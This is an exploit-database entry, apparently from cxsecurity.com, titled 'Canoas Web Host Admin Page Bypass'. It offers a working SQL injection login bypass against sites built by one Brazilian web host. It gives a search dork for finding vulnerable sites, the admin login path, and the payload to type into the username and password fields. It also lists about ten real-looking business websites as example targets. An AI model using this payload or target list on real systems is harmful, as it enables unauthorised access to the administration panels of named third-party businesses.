Canoas Web Host Admin Page Bypass

2016.04.14
Credit: Ashiyane Digital Security Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:" Desenvolvido por Canoas Web Host"

###################### # Exploit Title : Canoas Web Host Admin Page Bypass # Exploit Author : Ashiyane Digital Security Team # Contact: n3t.hacker@gmail.com # Vendor Homepage : http://canoasweb.com.br/comae/ # Google Dork : intext:" Desenvolvido por Canoas Web Host" # Date: 11 Apr 2016 # Tested On : Kali / iceweasel ###################### # # Search dork and select Target , put /admin/login.php after url such as : # http://site.com/admin/login.php # Now enter fill Login(username) and Senha(Password) like the information below : # Login : '=' 'OR' # Senha : '=' 'OR' # # e.g: # http://www.kraemer-rs.com.br/admin/login.php # http://www.polysul.com.br/admin/login.php # http://relusilsul.com.br/admin/login.php # http://www.donatomoveisedecoracoes.com.br/admin/login.php # http://www.lcdmonitores.com.br/admin/login.php # http://wmgp.com.br/admin/login.php # http://www.construtoraepoca.com.br/admin/login.php # http://canoasweb.com.br/comae/admin/login.php # http://supremaexpress.com/admin/login.php # http://www.marcenariadonato.com.br/site/admin/login.php # # ###################### # discovered by : Net Hacker ######################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top